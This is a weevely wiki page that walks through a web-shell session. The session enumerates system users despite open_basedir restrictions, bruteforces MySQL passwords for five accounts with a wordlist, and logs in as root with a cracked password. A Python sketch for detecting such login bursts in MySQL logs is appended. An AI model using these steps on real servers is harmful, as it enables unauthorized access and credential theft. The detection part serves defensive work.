Bruteforce SQL credentials
epinna edited this page Sep 20, 2014 · 1 revision
This example shows how to bruteforce credentials of multiple SQL users.
- Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system and open_basedir = /var/www/html/
- Used modules: audit_etcpasswd, bruteforce_sql, and sql_console
Gather as many system usernames as we can. Even if the open_basedir hardening does not allow any access outside the web folder and we can't execute system commands, we can still enumerate the system users using the module audit_etcpasswd.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_1.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
www-data@target:/var/www/html PHP> cd ..
[-][cd] Failed cd '..': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions
www-data@target:/var/www/html PHP> :audit_etcpasswd -real
root:x:0:0:root:/root:/bin/bash
roblast:x:1000:1000:roblast,,,:/home/roblast:/bin/bash
micjanost:x:1001:1001:micjanost,,,:/home/micjanost:/bin/bash
pjgomes:x:1002:1002:pjgomes,,,:/home/pjgomes:/bin/bash
pdpeers:x:1003:1003:pdpeers,,,:/home/pdpeers:/bin/bash
www-data@target:/var/www/html PHP>
We got 5 usernames that we can try to bruteforce to find the SQL passwords. Launch the SQL bruteforce module, using the local file wordlists/huge.txt as the password wordlist.
www-data@target:/var/www/html PHP> :bruteforce_sql
error: too few arguments
usage: bruteforce_sql [-h] [-hostname HOSTNAME] [-users [USERS [USERS ...]]]
[-pwds [PWDS [PWDS ...]]] [-fusers FUSERS]
[-fpwds FPWDS]
{mysql,pgsql}
Bruteforce SQL database
positional arguments:
{mysql,pgsql} Service to bruteforce
optional arguments:
-h, --help show this help message and exit
-hostname HOSTNAME Hostname
-users [USERS [USERS ...]]
Users
-pwds [PWDS [PWDS ...]]
Passwords
-fusers FUSERS Local file path containing users list
-fpwds FPWDS Local file path containing password list
www-data@target:/var/www/html PHP> :bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt
roblast:reckoned
pjgomes:national
root:Gilchrist
www-data@target:/var/www/html PHP>
In a few seconds we got 3 out of 5 credentials. Use sql_console to check the found accounts.
www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
+--------------------+
| mysql |
| performance_schema |
| test |
| appdb |
+--------------------+
root@localhost SQL>
:)
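On the database side, the bruteforce run above appears as a burst of rejected logins for several accounts, all coming from the web server's own address. A detection sketch for that pattern follows; it is an added example, not part of the original page or of weevely, and the MySQL 5.7-style error-log format (log_error_verbosity=3), the thresholds and the sample log lines are assumptions constructed for illustration:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: MySQL 5.7-style error log with log_error_verbosity=3,
# which records each rejected login as an "Access denied" note.
DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.\d+Z \d+ \[Note\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'")

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
2024-01-01T10:14:02.500000Z 40 [Note] Access denied for user 'appuser'@'10.0.0.5' (using password: YES)
2024-01-01T10:15:01.100000Z 41 [Note] Access denied for user 'roblast'@'localhost' (using password: YES)
2024-01-01T10:15:01.300000Z 42 [Note] Access denied for user 'micjanost'@'localhost' (using password: YES)
2024-01-01T10:15:01.600000Z 43 [Note] Access denied for user 'pjgomes'@'localhost' (using password: YES)
2024-01-01T10:15:02.000000Z 44 [Note] Access denied for user 'pdpeers'@'localhost' (using password: YES)
2024-01-01T10:15:02.200000Z 45 [Note] Access denied for user 'root'@'localhost' (using password: YES)
2024-01-01T10:15:02.700000Z 46 [Note] Access denied for user 'root'@'localhost' (using password: YES)
2024-01-01T10:15:03.000000Z 47 [Note] Aborted connection 47 to db: 'appdb' user: 'appuser' host: '10.0.0.5' (Got an error reading communication packets)
"""

def find_bursts(lines, window=timedelta(seconds=10), min_failures=5, min_users=2):
    """Flag hosts with >= min_failures denied logins against >= min_users
    distinct accounts inside one sliding time window."""
    by_host = defaultdict(list)
    for line in lines:
        m = DENIED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
            by_host[m["host"]].append((ts, m["user"]))
    alerts = []
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1  # drop events that fell out of the window
            in_window = events[start:end + 1]
            if (len(in_window) >= min_failures
                    and len({u for _, u in in_window}) >= min_users):
                alerts.append({"host": host, "first_seen": events[start][0],
                               "total_failures": len(events),
                               "users": sorted({u for _, u in events})})
                break  # one alert per source host
    return alerts

if __name__ == "__main__":
    for alert in find_bursts(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single failed login from 10.0.0.5 stays below both thresholds, so only the localhost burst spanning five accounts is reported.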